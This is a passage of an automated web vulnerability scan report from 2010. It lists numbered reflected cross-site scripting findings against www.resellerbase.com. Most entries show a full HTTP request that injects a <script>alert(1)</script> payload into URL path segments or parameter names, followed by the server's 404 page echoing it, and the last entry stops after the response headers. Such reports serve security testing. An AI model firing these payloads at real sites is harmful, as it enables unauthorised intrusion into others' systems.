The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c92d6<script>alert(1)</script>fa97aa6ec66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagesc92d6<script>alert(1)</script>fa97aa6ec66/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagesc92d6<script>alert(1)</script>fa97aa6ec66/rating/ was not found on this server.</p>
...[SNIP]...

2.3300. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cf12e<script>alert(1)</script>e01fafe0b25 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/ratingcf12e<script>alert(1)</script>e01fafe0b25/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/ratingcf12e<script>alert(1)</script>e01fafe0b25/ was not found on this server.</p>
...[SNIP]...

2.3301. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d01a4<script>alert(1)</script>1d329551e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/?d01a4<script>alert(1)</script>1d329551e97=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/?d01a4<script>alert(1)</script>1d329551e97=1 was not found on this server.</p>
...[SNIP]...

2.3302. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75fb2<script>alert(1)</script>95b49d15fba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail75fb2<script>alert(1)</script>95b49d15fba/46/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail75fb2<script>alert(1)</script>95b49d15fba/46/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3303. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 144d6<script>alert(1)</script>e5d3708daed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46144d6<script>alert(1)</script>e5d3708daed/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46144d6<script>alert(1)</script>e5d3708daed/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3304. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eab7c<script>alert(1)</script>2b2bf63e38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themeseab7c<script>alert(1)</script>2b2bf63e38/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themeseab7c<script>alert(1)</script>2b2bf63e38/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3305. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0de7<script>alert(1)</script>c73bc9466e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmosf0de7<script>alert(1)</script>c73bc9466e6/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmosf0de7<script>alert(1)</script>c73bc9466e6/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3306. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e1231<script>alert(1)</script>84f507d43cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagese1231<script>alert(1)</script>84f507d43cc/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagese1231<script>alert(1)</script>84f507d43cc/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3307. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6976e<script>alert(1)</script>ad537c9b0b7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating6976e<script>alert(1)</script>ad537c9b0b7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating6976e<script>alert(1)</script>ad537c9b0b7/0.gif was not found on this server.</p>
...[SNIP]...

2.3308. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e167e<script>alert(1)</script>628a481f0c2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/0.gife167e<script>alert(1)</script>628a481f0c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/0.gife167e<script>alert(1)</script>628a481f0c2 was not found on this server.</p>
...[SNIP]...

2.3309. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adb19<script>alert(1)</script>d9b940c2bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/0.gif?adb19<script>alert(1)</script>d9b940c2bfe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/0.gif?adb19<script>alert(1)</script>d9b940c2bfe=1 was not found on this server.</p>
...[SNIP]...

2.3310. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e6c3<script>alert(1)</script>113d74b5bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7e6c3<script>alert(1)</script>113d74b5bf/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7e6c3<script>alert(1)</script>113d74b5bf/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3311. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26e83<script>alert(1)</script>b13782fbd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4626e83<script>alert(1)</script>b13782fbd41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4626e83<script>alert(1)</script>b13782fbd41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3312. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 302da<script>alert(1)</script>4409d8f6166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes302da<script>alert(1)</script>4409d8f6166/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes302da<script>alert(1)</script>4409d8f6166/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3313. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90c5f<script>alert(1)</script>bd40caa70bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos90c5f<script>alert(1)</script>bd40caa70bc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos90c5f<script>alert(1)</script>bd40caa70bc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3314. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e221<script>alert(1)</script>808b77956ba was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images9e221<script>alert(1)</script>808b77956ba/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images9e221<script>alert(1)</script>808b77956ba/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3315. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 951e6<script>alert(1)</script>f831f2a46d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating951e6<script>alert(1)</script>f831f2a46d3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating951e6<script>alert(1)</script>f831f2a46d3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3316. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bb1f7<script>alert(1)</script>1b5901042ca was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/search.phpbb1f7<script>alert(1)</script>1b5901042ca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.phpbb1f7<script>alert(1)</script>1b5901042ca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3317. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bed74<a>749c8176eca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbed74<a>749c8176eca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

